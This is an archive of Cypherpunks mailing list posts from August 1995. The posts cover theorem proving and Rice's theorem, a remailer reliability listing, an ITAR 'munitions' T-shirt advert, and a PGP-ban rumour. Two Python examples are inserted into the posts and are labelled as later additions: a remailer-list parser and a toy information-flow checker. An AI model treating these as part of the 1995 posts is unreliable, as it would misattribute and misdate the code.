To: Michael Handler <grendel@netaxs.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <Pine.SUN.3.91.950806232140.17572A-100000@unix1.netaxs.com>
Message-ID: <Pine.3.89.9508062303.S15677-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 6 Aug 1995, Michael Handler wrote:

> There are more fundamentalist Christians involved in the crypto movement 
> than you realize.

They already know about me.....

Nathan
Cypto-Christo-punk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 7 Aug 95 00:14:58 PDT
To: cypherpunks@toad.com
Subject: Quibbling about definitions of "proof"
Message-ID: <ac4b096d0102100487ad@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Look, you all, I'm *really sorry* I even brought up the subject of proofs
of correctness!

As I feared, any mention of certain loaded words immediately brings the
quibblers out of their lairs to dissect the "real meaning" of one or more
terms.

I had thought that my carefully worded mention of the Boyer-Moore prover
and that this means little for actual implementations would deter quibbling
over the cosmic significance of "proof." (An interesting topic, by the way,
as Ray's knowledgeable article makes clear. But metamathematics is an
arcane subject and short articles are rarely persuasive...we debated the
same stuff a couple of years ago on the Extropians list.)

With 700 subscribers, quibbling is the usual state of affairs. No matter
what is said, someone will quibble over terms or meanings. No wonder it is
the major venal sin at West Point.

The Boyer-Moore theorem prover is an accepted ("Huh? Define what you mean
by "accepted"! Not all of us accept that term.") term of art. If you
disagree, or wish to raise the possibility that the computer glitched
during the proof, there are entire newsgroups devoted to such arcania.

On a more mundane note, my Internet Service Provider of the past 6 weeks
just sent out an urgent notice tonight announcing that they are no longer
"sensemedia.net" and have become "got.net" (as in "got net?" as in "got
milk?"). This means my 3 years as "tcmay@netcom.com" is followed by 6 weeks
as "tcmay@sensemedia.net" and an as-yet-undetermined time as
"tcmay@got.net" (at least until the "Got milk?" ad people get wind of this
pun and tell them to change to something else).

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 6 Aug 95 22:50:13 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: RSA has been proved correct
In-Reply-To: <199508070329.XAA11774@clark.net>
Message-ID: <Pine.3.89.9508062316.U15677-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 6 Aug 1995, Ray Cromwell wrote:

>    All you need to do is verify yourself (i.e. formally prove the
> correctness of the theorem prover) to rely on the results of the
> theorem prover. 

Oh, is THAT all?  (more on this later)


> denying the Peano postulates)
(Perish the thought!)

>The theorem prover works like this:

<elided brute-force prover>

Do you advise using the unabridged Archimedian Sieve to determine if a 
number is prime?

> a false theorem, although it will fail to prove some theorems. 

Just feed it ~X as well.

> And it is
> news to me that "the general mathematical community is still suspicious of
> the four color theorem." Not only are they not suspicous of the theorem,
> they aren't suspicious of the proof. It's been verified and reproduced
> over and over again, and it has also been shortened down from the
> original (I believe 2000+ special graph cases) to just over 400.

Now we hit an impasse.  I thought the 4-color theorem was considered done 
as well, until a professor of mine contradicted me on this point.  It 
sounds like you might have more current info.  (Mine is 2-3 years old.)


> [note above: the theorem prover fails if the production rules allow
> theorem shortening. The system must be primitive recusive, but there
> are many restricted domains of theorem proving which are.]

Very restricted, I would think.  Most cases of universalizing would, I'd 
guess.

>   The classification of the simple groups was a 1000+ page written
> proof. Which one is would you trust to have a mistake somewhere? The
> computer checked one, or the human checked one?

That depends on my trust of the human and of the checker.  Frankly, I'd 
be leery of either.  (And I was told in Algebra that it was 10k+, but the 
point is basically the same.)

>   This general line of discussion is getting out of hand. You can't
> *prove* anything for sure. Even if it seems logical to you, how do you
> know your own mind isn't buggy? 

This is one of the points that I have pushed on this issue.  Our intuition 
on many of these matters is _way_ off until you train it.  And still, 
there are famous cases of failure by trained people.

>   Ultimately, you can't even trust yourself. 

That's why we go to school.


Okay, on the subject of verifying theorem checkers:

First, you mention some distance into your post, that the theorems being 
checked must be "primitively recursive".  That rather limits you away 
from interesting theorems, wouldn't you say?  In particular, you couldn't 
dream of touching those earlier mentioned biggies.  But that's not all.  
Try the Galois theorems.  Fermat's little theorem?   Baire category 
theorem?  Chinese Remainder Theorem?  Fundamental Theorem of Algebra?  
(In topology, in complex anal, in algebra...)

So I assume that the theorem checkers being deployed aren't limited to 
handling primitively recursive systems.  You now are dealing with a 
rather extensive program.  And proving that a general theorem prover 
works is _not_ something to just sit & do.

.......

Nathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 7 Aug 95 02:18:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: There's a hole in your crypto...
In-Reply-To: <Pine.3.89.9508042253.A3820-0100000@jake.bga.com>
Message-ID: <9508070918.AA19988@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


No crypto/privacy relevance, delete or flame now....

Nathan writes:
> This is why the "not a Turing machine" assertion that the "Professor" is 
> important.  We know that Turing machine is undecidable, so if we want to 
> limit behavior, we can't have one.  BUT---we don't know that being a 
> Turing machine is equivalent to having "unpredictable" behavior.  
> Furthermore, a "proof" of the "not a Turing machine" assertion is going 
> to have to be done by--you guessed it--a computer.  And this computer is 
> running a program which definitely IS a Turing machine, if it is capable 
> of "proving" that other (suitably non-trivial) programs are not Turing 
> machines.

I think this is a bit misguided. The Turing machine (TM) is an extremely general
abstract model of computation. The gargantuan hunk of code that runs the 
Space Shuttle can be viewed as a Turing machine, as can a "Hello world" program
written in Visual BASIC. So, there's not really a question about whether or
not we're talking about Turing machines (unless perhaps you want to discuss
quantum theorem provers and QTMs :) 

Now, Rice's Theorem says that all non-trivial properties of TMs are undecidable.
If I pick a "non-trivial" property, I can't conceivably build a TM ("write a
program", if you like) that, upon input of the specification of an arbitrary TM,
can tell whether or not that TM exhibits the property I picked. This does not
mean that I can't decide whether some particular TMs have that property or not --
I can. I just can't write down a procedure that handles the general case.

Also, this theorem clearly hinges on the meaning of "trivial". From what I've
seen, a very strict interpretation is largely appropriate; nearly everything
except the least exciting of trivial low-level properties of TMs seems to come
out to be "non-trivial" in this regard. The proof of the theorem is more
precise about this, naturally, but I've found this useful as a working
colloquial definition.

-Futplex    
August 7, 1995     "Enola Gay, you should have stayed at home yesterday" -OMD



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 7 Aug 95 06:50:46 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508071350.GAA09095@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 7 Aug 95 6:00:20 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         *****+***-*+  1:17:21  99.99%
gondolin mixmaster@gondolin.org           * -++*-+****    43:12  99.98%
ford     remailer@bi-node.zerberus.de     .*-**++**-**    15:34  99.97%
portal   hfinney@shell.portal.com         ***#####****     3:17  99.94%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***##*#+#**      6:11  99.94%
replay   remailer@replay.com              ****+*******    11:17  99.87%
rmadillo remailer@armadillo.com           ++.-+*++-+**  1:36:12  99.84%
alumni   hal@alumni.caltech.edu           ***##******      4:08  99.83%
hacktic  remailer@utopia.hacktic.nl       ************    12:39  99.74%
crown    mixmaster@kether.alias.net       -----------   2:05:54  99.74%
vox      remail@vox.xs4all.nl             .-..-.....   23:52:15  99.99%
rebma    remailer@rebma.mn.org            -..+-.+..--  16:26:15  99.68%
vishnu   mixmaster@vishnu.alias.net       *****+* **--    36:02  99.32%
penet    anon@anon.penet.fi               - -**++-++*+  2:39:49  98.59%
hroller  hroller@c2.org                   *  -+*-#**+*    44:23  98.16%
syrinx   syrinx@c2.org                    -  --------   2:33:46  97.89%
mix      mixmaster@remail.obscura.com     -__.--------  6:25:13  97.55%
c2       remail@c2.org                    *  -++-+++-+  1:34:04  97.30%
extropia remail@extropia.wimsey.com       -.__..--.-.  15:02:35  96.68%
ideath   remailer@ideath.goldenbear.com   ..-  .-.--   12:33:17  95.40%
flame    remailer@flame.alias.net           ++++++++++    52:48  95.20%
rahul    homer@rahul.net                  ****#**++***     5:28  99.99%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
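
A parser for the two parts of the listing above, as an added Python example (it is not premail's code): it reads the $remailer{...} capability lines and the latency/uptime table, then picks remailers that meet a feature and reliability requirement. The sample lines are a subset copied from the listing; the function names and the selection thresholds are assumptions.

```python
import re

# Subset of the listing above, copied verbatim (not live data).
LISTING = r'''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
replay   remailer@replay.com              ****+*******    11:17  99.87%
hacktic  remailer@utopia.hacktic.nl       ************    12:39  99.74%
vox      remail@vox.xs4all.nl             .-..-.....   23:52:15  99.99%
penet    anon@anon.penet.fi               - -**++-++*+  2:39:49  98.59%
mix      mixmaster@remail.obscura.com     -__.--------  6:25:13  97.55%
flame    remailer@flame.alias.net           ++++++++++    52:48  95.20%
'''

CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
# The history column may contain spaces, so it is matched lazily and the
# latency and uptime columns are pinned to the end of the line.
STATS_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d+)\s+(\d+(?:\.\d+)?)%$')


def latency_seconds(text):
    """Convert 'mm:ss' or 'h:mm:ss' to seconds."""
    total = 0
    for part in text.split(":"):
        total = total * 60 + int(part)
    return total


def parse_listing(text):
    """Return {short name: {address, caps, key_id, history, latency, uptime}}."""
    remailers = {}
    for raw in text.splitlines():
        line = raw.strip()
        m = CONFIG_RE.match(line)
        if m:
            name, address, caps = m.group(1), m.group(2), m.group(3).split()
            entry = remailers.setdefault(name, {})
            entry["address"] = address
            entry["caps"] = {c.rstrip(".") for c in caps}
            # "pgp." means the short name, not the address, is the key ID.
            if "pgp." in caps:
                entry["key_id"] = name
            elif "pgp" in caps:
                entry["key_id"] = address
            else:
                entry["key_id"] = None
            continue
        m = STATS_RE.match(line)
        if m and m.group(1) in remailers:
            entry = remailers[m.group(1)]
            entry["history"] = m.group(3)
            entry["latency"] = latency_seconds(m.group(4))
            entry["uptime"] = float(m.group(5))
    return remailers


def select(remailers, required, min_uptime, max_latency):
    """Names supporting every required capability within the given
    uptime (percent) and latency (seconds) bounds, most reliable first."""
    ok = [name for name, r in remailers.items()
          if "uptime" in r and required <= r["caps"]
          and r["uptime"] >= min_uptime and r["latency"] <= max_latency]
    return sorted(ok, key=lambda n: (-remailers[n]["uptime"],
                                     remailers[n]["latency"]))


if __name__ == "__main__":
    table = parse_listing(LISTING)
    # Mixmaster-capable, PGP-capable, at least 99% uptime, under one hour.
    print(select(table, {"mix", "pgp"}, 99.0, 3600))
```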




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dhenson@itsnet.com (Don Henson)
Date: Mon, 7 Aug 95 07:06:17 PDT
To: terra-libra@netcom.com
Subject: Over 350 'Munitions T-shirts' Shipped
Message-ID: <199508071416.IAA14134@scratchy.itsnet.com>
MIME-Version: 1.0
Content-Type: text/plain


As of 27 July 1995, we have shipped over 350 of the RSA/Perl Munition 
T-shirts. Orders are still pouring in. Don't be left out. Order yours 
today.

Now you can wear a TSHIRT that has been classified as a MUNITION by the 
US Government. That's right! The US International Traffic in Arms 
Regulations (ITAR) makes exporting cryptographic materials illegal. 
ITAR further defines export as providing cryptographic information to a 
non-US/Canadian citizen even if you are inside the US at the time. 
Providing information is further defined as telling or showing 
information to a non-US/Canadian citizen. The Munitions Tshirt has a 
Perl implementation of the RSA algorithm (the one used by PGP) printed 
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where 
a non-US/Canadian citizen can see it, even if it is inside the US, you 
have just exported cryptographic material (which is already freely 
available outside the US) and have become a criminal in the eyes of the 
US Government. Now you too can become an international arms dealer for 
the price of a tshirt (US$15.95 - US$19.95, depending on size) and the 
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitions
Tshirt by ordering the tshirt from a source that is outside the US. The 
email response to a request for info (see next paragraph) includes full 
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil 
disobedience, just send email to dhenson@itsnet.com with the subject of 
'SHIRT'. (You don't have to be a US/Canadian citizen to request the 
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the 
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help 
defend the author of PGP from harassment and possible prosecution by 
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund 
your purchase price.  :-)

Get your Munitions Tshirt now. Who knows how long they'll stay in 
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 7 Aug 95 05:54:43 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
In-Reply-To: <9508070918.AA19988@cs.umass.edu>
Message-ID: <9508071253.AA10347@all.net>
MIME-Version: 1.0
Content-Type: text


> No crypto/privacy relevance, delete or flame now....
...
> Now, Rice's Theorem says that all non-trivial properties of TMs are undecidable.
> If I pick a "non-trivial" property, I can't conceivably build a TM ("write a
> program", if you like) that, upon input of the specification of an arbitrary TM,
> can tell whether or not that TM exhibits the property I picked. This does not
> mean that I can't decide whether some particular TMs have that property or not --
> I can. I just can't write down a procedure that handles the general case.
> 
> Also, this theorem clearly hinges on the meaning of "trivial". From what I've
> seen, a very strict interpretation is largely appropriate; nearly everything
> except the least exciting of trivial low-level properties of TMs seems to come
> out to be "non-trivial" in this regard. The proof of the theorem is more
> precise about this, naturally, but I've found this useful as a working
> colloquial definition.

Issue 1:

Undecidable for arbitrary programs does not mean undecidable for every
program.  For all finite programs with finite input sequences, all
properties are decidable.  Complexity may make proofs for large programs
infeasible at this time, but that is all.

Now back to the point of the discussion.  For certain classes of
programs, we can prove many things that are relevant to information
protection.  Furthermore, as we attempt these proofs, we may find and
fix the program anomalies (i.e., bugs) that would cause the program to
fail in an undesirable way.  Therefore, the proof techniques give us two
benefits - they help us fix the programs, and they help increase the
assurance that the programs do precisely what they are supposed to do
and nothing else.

Issue 2:

The notion that mathematics somehow excludes linguistic proofs
(forwarded I believe by a user with "may" in their email address) is
nonsense.  Mathematics at its core is based on linguistic notions that
are defined in plain language.  These notions develop a system of rules
which may be applied to decide the veracity of a proposition.  The
rules themselves form a language with syntax and semantics just as
the language that defines them has syntax and semantics.

The notion of separating language from mathematics is a fine and
interesting one, but it certainly does not apply to any mathematics
currently in widespread use.  A proof done without mathematical symbols
is no less a proof.

Issue 3:

Let's get back to the point of this discussion.  What can we really
prove about algorithms? I have made the assertion that an interesting
property for the purposes of assessing integrity, availability, and
confidentiality for servers like the W3 server and the gopher server is
the limitation of information flow.  I have backed up my assertion with
a demonstration in the form of programs that do this and English
demonstrations that that is of real value.

Does anyone disagree? Why? Is there a reason this same analytical
technique cannot be used on PGP or other cryptosystems to demonstrate
that there are no back doors (other than perhaps in the underlying
inadequacy of the overall technique)? How hard is it to do this for such
programs? What programming structures make this difficult? Will it
reveal many programming errors and therefore be a useful general purpose
tool for writing better programs?

Just thought I would stir things up a bit.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
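
Added example (not part of the original message, and not one of the programs Cohen refers to): for a program with finite inputs, the information-flow limit discussed under Issues 1 and 3 can be decided by running every input. The two toy handlers, the 8-bit secret and the 64-request space are assumptions constructed for illustration.

```python
"""Deciding an information-flow property of a finite program by enumeration.

Property checked (noninterference): for every request, the reply is the same
whatever the secret is. All names below are hypothetical.
"""
from itertools import product

SECRETS = range(256)                           # every possible 8-bit key
REQUESTS = list(product(range(4), range(16)))  # every (opcode, arg) pair


def handle_clean(secret, request):
    """Toy server whose reply is a function of the request only."""
    opcode, arg = request
    if opcode == 0:
        return ("echo", arg)
    if opcode == 1:
        return ("square", arg * arg % 16)
    return ("error", 0)


def handle_backdoored(secret, request):
    """Same server, plus one hidden request whose reply depends on the key."""
    opcode, arg = request
    if opcode == 3 and arg == 13:
        # Implicit flow: the key is never copied out, but one bit of it
        # selects which reply is sent.
        return ("error", 1 if secret & 0x80 else 0)
    return handle_clean(secret, request)


def find_flow(program, secrets, requests):
    """Return None if no reply depends on the secret.

    Otherwise return a witness
    (request, secret_a, secret_b, reply_a, reply_b) showing two secrets
    that an observer of the reply can tell apart.
    """
    for request in requests:
        baseline = None
        for secret in secrets:
            reply = program(secret, request)
            if baseline is None:
                baseline = (secret, reply)
            elif reply != baseline[1]:
                return (request, baseline[0], secret, baseline[1], reply)
    return None


def runs_needed(secrets, requests):
    """Number of program executions the exhaustive check performs at most."""
    return len(secrets) * len(requests)


if __name__ == "__main__":
    print("runs:", runs_needed(SECRETS, REQUESTS))
    print("clean:", find_flow(handle_clean, SECRETS, REQUESTS))
    print("backdoored:", find_flow(handle_backdoored, SECRETS, REQUESTS))
```

The check is complete only because both input sets are finite and small; every added input bit doubles the number of runs, which is the complexity limit the message mentions.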



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 7 Aug 95 09:18:48 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <ac4b8bc603021004275c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:53 PM 8/7/95, Dr. Frederick B. Cohen wrote:

>Issue 2:
>
>The notion that mathematics somehow excludes linguistic proofs
>(forwarded I believe by a user with "may" in their email address) is
>nonsense.  Mathematics at its core is based on linguistic notions that

Not this "May," so far as I can recall.

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Mon, 7 Aug 95 07:02:20 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: (Fwd) Re: Law enforcement and PGP ban in Australia (fwd)
Message-ID: <Pine.SUN.3.91.950807100131.14342D-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain





Followup on the Ozzies banning PGP:
------- Forwarded Message Follows -------
Date:          Mon, 07 Aug 1995 16:44:12 +1000
From:          "Danny Smith, AUSCERT" <D.Smith@auscert.org.au>
To:            mauvais@ocelot.llnl.gov
Cc:            first-teams@CSRC.NCSL.NIST.GOV
Subject:       Re: Law enforcement and PGP ban in Australia
Organization:  FIRST, the Forum of Incident Response & Security Teams
Reply-to:      "Danny Smith, AUSCERT" <D.Smith@auscert.org.au>

Paul (et al),

> I'm curious about what people have heard about this?
> 
> I'm trying to find out more from this end....doesn't look good...

Surprised you didn't come to us first.  :-)

> Subject: Australia next to ban PGP

I believe you can treat this as net.rumour.  I have the paper now, and will
read it tonight.  I will also talk to the author whom I am led to believe
is rather annoyed at the misrepresentation of the content of his paper.

More information later this week.

Danny Smith.

==========================================================================
 Danny Smith                      |  Fax:    +61 7 3365 4477
 AUSCERT                          |  Phone:  +61 7 3365 4417
 c/- Prentice Centre              |  (answered during business hours)
 The University of Queensland     |  (on call after hours for emergencies)
 Qld.  4072.  Australia           |  Internet:  auscert@auscert.org.au





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Aug 95 07:08:46 PDT
To: cypherpunks@toad.com
Subject: NYPotpourii
Message-ID: <199508071408.KAA26096@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Abject beg: it's easier for the 'droid to act on each item
   separately, do please request 1-by-1.


   8-7-95.  NYPaper:


   "A Cyberspace Front in a Multicultural War: Finding
   alternatives to a world where only English is typed."

      With the explosion of worldwide interest in the
      Internet, the dominance of English, stemming from the
      network's beginnings in the United States, has become a
      sensitive matter. A fear is that English, already the
      international language of business and science, is
      becoming the lingua franca of the computer world as
      well, further casting other languages in the shade. And
      some countries, already unhappy with the encroachment of
      American culture are worried that their cultures will be
      further eroded by an American dominance in cyberspace.
      A consortium of American computer companies has
      developed a universal digital code known as Unicode to
      allow computers to represent the letters and characters
      of virtually all the world's languages.        SEZ_who


   "Digital Commerce: 2 plans for watermarks, which can bind
   proof of authorship to electronic works." Denise Caruso's
   column.

      As information becomes currency in the global economy,
      that so-called digital watermark technologies are
      beginning to appear. As with their paper and broadcast
      counterparts, the concept behind digital watermarks is
      to provide a secure means to certify the origin,
      ownership and authenticity of digital works. And by
      doing so, they can provide the first line of defense
      against piracy of digital media like music, photographs,
      film, words and video games.                   MUN_due


   "Windows 95's Big Value May Be as a Lure to Network
   System."

      Is Windows 95 a decoy? For all the attention being paid
      to the Aug. 24 introduction of the Microsoft
      Corporation's updated personal computer operating
      system, some experts think the software's true strategic
      value to Microsoft is not the few billion dollars in
      sales it is expected to bring to the company over the
      next few years. Instead, the long-term value may lie in
      luring customers and software developers into adopting
      the company's other operating system: Windows NT, for
      corporate computer networks.                   COY_ote


   "Selling Virtual Reality, in Indiana: The owners were
   shocked by how few understood the technology."

      "Seeing the potential for educating had an incredible
      impact on me," said John Hammond, an Indianapolis
      businessman who stumbled on Virtually Yours when he and
      his son went to the shopping center for pizza. Mr.
      Hammond wants Virtually Yours to supply expertise and
      equipment to Sunship Ministries, a group of Christian
      business executives developing a design for a school,
      hospital and church complex suited for missionary work
      in developing countries. Mr. Hammond sees virtual
      reality as a marketing tool for getting developing
      countries to welcome them; he sees programs re-creating
      Bible stories as a powerful tool for preaching to
      nonreaders. "You could let people interact with a
      virtual Jesus," Mr. Hammond said.              GIT_rel


   "Dark Sun: The Making of the Hydrogen Bomb." [Book review]

      In the author's view the story of the hydrogen bomb is
      only secondarily a technological one. What mainly drove
      American physicists to design the more powerful bomb was
      the news that the Soviet Union possessed an atom bomb.
      And the reason the Russians had achieved the bomb was
      mainly spying, Mr. Rhodes insists. So his story of the
      H-bomb is not so much technology as the interaction of
      politics, diplomacy, war, espionage, theoretical and
      practical physics and paranoia.                JOX_onu









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Mon, 7 Aug 95 10:13:03 PDT
To: dhenson@itsnet.com (Don Henson)
Subject: Re: Over 350 'Munitions T-shirts' Shipped
In-Reply-To: <199508071416.IAA14134@scratchy.itsnet.com>
Message-ID: <199508071710.KAA28434@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Where are mine...I got the money to you via
Mario wojo???? at SUN...
I ordered 8 of the shirts
BTW
I am the publisher of PGP 1.0 the only person
who will be indicted with Phil or alone for PGP
what about MY defense fund????

Check Gov Access for my story

    cheers
    kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Mon, 7 Aug 95 07:23:04 PDT
To: Joe McGuckin <joe@ns.via.net>
Subject: Re: Encrypted internet traffic to Singapore??
In-Reply-To: <199508070138.SAA12404@ns.via.net>
Message-ID: <199508071422.KAA10423@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe McGuckin writes:
> A client of mine wishes to set up a connection to their
> Singapore office using the internet rather than a dedicated 
> leased line.
> 
> They would like to encrypt the data going between the branch
> office in Singapore and the home office in California. 
> 
> I am considering using something like swIPe for this? Seem reasonable?

Probably for the next month or so since IPSEC implementations aren't
out. (Well, actually, Morningstar is already reportedly offering them
to selected test customers but that might not be true -- in any case
